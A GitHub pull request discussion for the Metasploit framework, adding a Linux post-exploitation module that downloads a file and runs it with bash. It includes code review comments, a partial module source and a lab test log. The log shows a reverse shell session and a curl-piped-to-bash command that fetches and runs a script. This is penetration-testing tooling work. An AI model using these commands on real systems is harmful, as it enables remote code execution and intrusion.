Post linux manage download exec #1596

Merged
merged 1 commit into from Mar 20, 2013

2 participants

@jabra-

Linux post module to download and run a file

@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 14, 2013
lib/msf/core/post/common.rb
@@ -80,6 +80,10 @@ def cmd_exec(cmd, args=nil, time_out=15)
return o
end
+ def vcmd_exec(cmd, args=nil, time_out=15)
@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

I must to admit I dont see a real benefit defining this method into the mixin. And I dont like the idea of combining presentation helpers with logic into the same mixin. Maybe would be a good idea to add this helper into your modules atm.

But yeah! it's just my opinion :) So I'm going to ask someone more to share opinion about this point!

@jabra-
jabra- added a line comment Mar 14, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 14, 2013
modules/post/linux/manage/download_exec.rb
+require 'msf/core/post/file'
+require 'msf/core/post/linux/system'
+require 'msf/core/post/linux/priv'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Download Exec',
+ 'Description' => %q{
+ This module downloads and runs a file with bash.
@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

I would love to see reflected in the description which "curl" and "bash" are needed in the target system. What do you think?

@jabra-
jabra- added a line comment Mar 14, 2013

I suppose I could add a check to do which curl and which bash. Not a problem.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 14, 2013
modules/post/linux/manage/download_exec.rb
+ include Msf::Post::Linux::System
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Download Exec',
+ 'Description' => %q{
+ This module downloads and runs a file with bash.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Joshua D. Abraham <jabra[at]praetorian.com>',
+ ],
+ 'Platform' => [ 'linux' ],
+ 'SessionTypes' => [ 'shell' ]
@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

Since it's using cmd_exec maybe it's also compatible with a meterpreter session, did you test?

@jabra-
jabra- added a line comment Mar 14, 2013

I didnt try it on Windows, since I was focused on Linux at the time.

@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

yeah meterpreter on Linux I mean

@jabra-
jabra- added a line comment Mar 14, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jabra-

added auto-detection of bash and curl from the PATH.

@jvazquez-r7

Hi @jasbro ,

After discussing with @jlee-r7, we're going to ask avoiding to merge the vcmd_exec into the Common Post mixin, because in this way it's merging a presentation helper into a "logic" mixin.

On the other hand, as pointed by @jlee-r7, doesn't seem the best idea vprint_status'd the command before running it. Also pointed by him, when there are commands without output, vprint empties outputs can annoy to the user.

I guess would be a good idea to include the helper in your modules atm, following the recommendations above. Sure it would help to accelerate the review :)

Thanks very much in advance! and if you have any questions, don't hesitate to ask !

@jvazquez-r7

Working as expected with shell sessions:

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (36 bytes) to 192.168.1.159
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.159:48138) at 2013-03-20 16:44:49 +0100

msf exploit(handler) > use post/linux/manage/download_exec
msf post(download_exec) > show options

Module options (post/linux/manage/download_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   URL                       yes       Full URL of file to download.

msf post(download_exec) > set SESSION 1
SESSION => 1
msf post(download_exec) > set url http://localhost/test.sh
url => http://localhost/test.sh
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > sessions -i 1
[*] Starting interaction with 1...

1730827770
lrMxozAifMwvqjccHHmsjOvzwrVuAQGd
aDiCHMssYpPGXcFChzjDdguTqNyAJKZw
UnAonWqkQUxQSdcCPKfhzynIczTNroXD
cat /var/www/test.sh
#!/bin/bash

touch /tmp/pwned.txt
echo "hola" > /tmp/pwned.txt
cat /tmp/pwned.txt
hola
^C
Abort session 1? [y/N]  y

[*] 192.168.1.159 - Command shell session 1 closed.  Reason: User exit
msf post(download_exec) > 

But I've notices when curl isn't available on the $PATH it just exists silently, because of this I've tried to solve with https://github.com/jasbro/metasploit-framework/pull/2 , it tries to check if curl is in the path before proceeding. I think is valuable, but please, feel free to review and if agree with changes just land it, and this pr will be updated automatically :)

@jvazquez-r7

Thanks for landing it, merging!

@jvazquez-r7 jvazquez-r7 merged commit aa22a82 into rapid7:master Mar 20, 2013

1 check was pending

Details default The Travis build is in progress
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment